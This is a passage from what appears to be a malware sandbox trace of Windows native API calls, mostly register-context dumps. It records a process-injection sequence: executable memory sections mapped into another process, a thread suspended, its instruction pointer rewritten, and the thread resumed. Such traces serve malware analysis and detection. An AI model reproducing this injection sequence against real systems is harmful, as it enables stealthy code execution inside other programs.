[373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0140.255] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0140.255] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x10e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x10f000) returned 0x0 [0140.262] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x10e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x2be0000, SectionOffset=0x0, ViewSize=0xde6e8*=0x10f000) returned 0x0 [0140.308] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0140.318] NtClose (Handle=0x1a8) returned 0x0 [0140.318] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x727000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x2c5b717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0140.433] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0140.433] NtClose (Handle=0x1a4) returned 0x0 [0140.433] NtClose (Handle=0x1a0) returned 0x0 [0140.435] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x11e4, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0140.435] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0140.435] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0140.435] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x21a000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0140.435] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0140.495] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x11e8) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0140.495] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0140.495] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2270000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0140.503] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x21a000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0140.506] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0140.506] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x144200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0x145000) returned 0x0 [0140.517] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x144200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0xba0000, SectionOffset=0x0, ViewSize=0xde6e8*=0x145000) returned 0x0 [0140.546] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0140.555] NtClose (Handle=0x1a8) returned 0x0 [0140.555] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x21a000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0xc51717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 